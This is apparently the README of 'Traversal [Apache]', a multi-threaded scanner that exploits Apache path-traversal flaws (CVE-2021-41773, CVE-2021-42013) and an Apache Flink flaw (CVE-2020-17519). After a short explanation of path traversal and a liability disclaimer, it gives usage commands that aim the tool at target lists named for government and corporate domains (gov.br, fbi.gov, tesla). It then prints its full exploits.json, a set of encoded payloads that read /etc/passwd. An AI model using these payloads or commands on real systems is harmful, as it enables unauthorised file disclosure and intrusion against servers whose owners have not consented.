A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with โdot-dot-slash (../)โ sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. It should be noted that access to files is limited by system operational access control (such as in the case of locked or in-use files on the Microsoft Windows operating system).
This or previous program is for Educational purpose ONLY. Do not use it without permission.
The usual disclaimer applies, especially the fact that me (Imhunterand) is not liable for any
damages caused by direct or indirect use of the information or functionality provided by these
programs. The author or any Internet provider bears NO responsibility for content or misuse
of these programs or any derivatives thereof. By using these programs you accept the fact
that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these
programs is not Imhunterand responsibility.
python main.py --file gov.br.txt --thread 15
python main.py --file tesla.txt --ssl
python main.py --range 192.168.15.1,192.168.15.100 --thread 30
python main.py --file fbi.gov.txt --thread 15 --timeout 3
python main.py --file gov.ru.txt --debug
python main.py --help
.,,
(=\/\
\=\/\
\=\/\
`=\/
\
TRAVERSAL [ APACHE ]
โโโ โโโโโโ โโโ โโโโโโ โโโ โโ โโโโโโ โโโ โโโ
โโโโโโ โโโโ โโโโโโโโโ โโโโ โโ โโโโ โโโโโโ โ โโโโโโ โโโโ
โโโ โโโ โโโโ โโโโโโโ โโโ โโโ โ โโโโโโโโโ โโโโ โโโ โโโ โโโโ
โโโโโโโโโ โโโโโโโ โโโโโโโโโโ โโโโ โโโโโโโ โโโ โ โโโโโโโโโโโโ โโโโ
โโ โโโโโโโโ โ โ โโ โโโโโ โโโโโ โโโโโโโโโโโโโโโโโโ โโ โโโโโโโโโโโโ
โโ โโโโโโโโ โ โ โโ โโโโโ โโ โ โ โ โโโโโโ โโโ โ โ โโ โโโโโ โโโ โ
โ โโ โโโ โ โ โโ โ โ โ โ โโโ โโ โโ โ โ โ โโ โโ โ โ โ
โ โ โโ โ โ โ โ โโ โโ โ โ โ โ โ โ
โ โ โ โโ โ โ โ โ โ โ โ โ โ
โ
By: imhunterand /labsbots.com/
https://twitter.com/imhunterand
https://github.com/imhunterand/
usage: tool [-h] [--file <ips.txt>] [--range <ip-start>,<ip-end>]
[--thread <20>] [--ssl] [--timeout <5>] [--debug]
[!] Check: CVE-2021-41773, CVE-2021-42013, CVE-2020-17519
[!] File exploits: /assets/exploits.json
[!] Output: output/vuln.txt
python main.py --file gov.br.txt --thread 15
python main.py --file tesla.txt --ssl
python main.py --range 192.168.15.1,192.168.15.100 --thread 30
python main.py --file fbi.gov.txt --thread 15 --timeout 3
python main.py --file gov.ru.txt --debug
optional arguments:
-h, --help show this help message and exit
--file <ips.txt> Input your target host lists
--range <ip-start>,<ip-end>
Set range IP Eg.: 192.168.15.1,192.168.15.100
--thread <20>, -t <20>
Eg. 20
--ssl Enable request with SSL
--timeout <5> Set connection timeout
--debug, -d Enable debug mode
.
โโโ assets
โย ย โโโ autor.json
โย ย โโโ config.json
โย ย โโโ exploits.json
โย ย โโโ prints
โย ย โโโ banner.png
โย ย โโโ print01.png
โย ย โโโ print02.png
โโโ LICENSE
โโโ main.py
โโโ modules
โย ย โโโ banner_mrclw.py
โย ย โโโ color_mrclw.py
โย ย โโโ debug_mrclw.py
โย ย โโโ file_mrclw.py
โย ย โโโ __init__.py
โย ย โโโ request_mrclw.py
โย ย โโโ shodan_mrclw.py
โย ย โโโ thread_mrclw.py
โโโ output
โโโ README.md
assets/exploits.json
{
"CVE-2021-41773": "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
"CVE-2021-42013-0": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd",
"CVE-2021-42013-1": "/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd",
"CVE-2021-42013-3": "/cgi-bin/.%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd",
"CVE-2021-42013-4":"/cgi-bin/%25%25%25%2e/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd",
"CVE-2020-17519-0":"/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd",
"CVE-2020-17519-1":"/cgi-bin/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
}
- https://owasp.org/www-community/attacks/Path_Traversal
- https://appcheck-ng.com/apache-path-traversal-vulnerability-cve-2021-41773/
- https://www.exploit-db.com/exploits/50383
- https://www.exploit-db.com/exploits/50406
- https://www.exploit-db.com/exploits/49398
- https://owasp.org/www-community/attacks/Path_Traversal